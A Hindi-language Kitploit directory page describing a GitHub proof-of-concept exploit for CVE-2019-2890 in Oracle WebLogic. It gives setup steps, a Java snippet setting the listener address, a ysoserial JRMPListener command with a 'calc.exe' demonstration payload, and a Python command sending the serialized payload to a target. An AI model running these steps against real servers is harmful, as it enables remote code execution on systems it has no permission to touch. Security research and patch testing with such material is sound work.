Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ianxtianxt/cve-2019-2890
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubianxtianxt/cve-2019-2890

CVE-2019-2890

CVE-2019-2890 के लिए PoC एक्सप्लॉइट जो Oracle WebLogic को लक्षित करता है, ysoserial पेलोड के माध्यम से JRMP डिसेरिएलाइज़ेशन का उपयोग करके रिमोट कमांड निष्पादन प्राप्त करता है।

रिपॉजिटरी देखें
426 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

घोषणा

केवल शैक्षिक और संचार उपयोग के लिए; अन्य उपयोगों के परिणामों की जिम्मेदारी स्वयं वहन करें।

विवरण

सभी संबंधित jar फ़ाइलें पहले ही प्रोजेक्ट में आयात की जा चुकी हैं, और शोषण विधि yso के JRMP का उपयोग करती है; सीखने और डिबगिंग के समय आप शोषण विधि को संशोधित कर सकते हैं।

पहले, weblogic के अंतर्गत SerializedSystemIni.dat फ़ाइल को security फ़ोल्डर में रखें।

फिर, yso का नाम बदलकर ysoserial.jar करें और इसे lib निर्देशिका में आयात करें।

1

इसके बाद, weblogic/wsee/jaxws/persistence/PersistentContext.java में getObject के IP पते और पोर्ट को संशोधित करें।

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

अंत में, दूरस्थ रूप से JRMP श्रवण के माध्यम से 7u21 कमांड निष्पादन का उपयोग करें।

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

उपयोग विधि: Poc.java चलाकर poc.ser सीरियलाइज़ेशन फ़ाइल उत्पन्न करें, फिर निम्न के माध्यम से:

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

टूल डाउनलोड करें